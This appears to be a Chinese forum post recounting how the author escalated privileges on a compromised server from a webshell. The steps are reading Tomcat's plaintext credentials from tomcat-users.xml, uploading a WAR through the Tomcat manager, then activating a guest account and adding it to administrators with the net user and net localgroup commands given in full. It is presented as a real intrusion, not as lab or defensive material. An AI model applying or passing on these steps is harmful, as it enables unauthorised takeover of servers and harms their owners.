论坛某大牛发的shell,着么半会拿下...小菜分享经验..大牛莫笑

查看端口,有8080,tomcat会用到这个端口,而且权限很大

经典回顾:Webshell提权之Tomcat_JAVA

  用tasklist/svc命令查看系统进程信息,果真有tomcat

       经典回顾:Webshell提权之Tomcat_JAVA_02 

  来到tomcat目录conftomcat-users.xml,查看到其明文密码

       经典回顾:Webshell提权之Tomcat_JAVA_03 

  到tomcat后台登录上去,上传war包

       经典回顾:Webshell提权之Tomcat_JAVA_04 

  查看下系统用户,经测试,不可以直接添加用户,但可以把系统内置帐户添加到管理员

      经典回顾:Webshell提权之Tomcat_JAVA_05

  找到系统guest用户,应为guest用户密码为空

        经典回顾:Webshell提权之Tomcat_JAVA_06 

  使用net user HnabGuest /active:yes命令激活此guest用户

         经典回顾:Webshell提权之Tomcat_JAVA_07 

  用net localgroup administrators HnabGuest /add命令添加到管理员

         经典回顾:Webshell提权之Tomcat_JAVA_08 

  得到系统终端端口9021

        经典回顾:Webshell提权之Tomcat_JAVA_09 

  成功用guest用户登录上去

       经典回顾:Webshell提权之Tomcat_JAVA_10 

你会喜欢


Webshell变形技术集锦

非主流CMS阿拉丁+iis7拿Webshell

APT时代-窃密型WebShell检测方法的思考 

只有webshell,一样可以做代理,如何使用脚本程序做代理


经典回顾:Webshell提权之Tomcat_JAVA_11

亲喜欢吗?记得点赞|留言|分享



经典回顾:Webshell提权之Tomcat_JAVA_12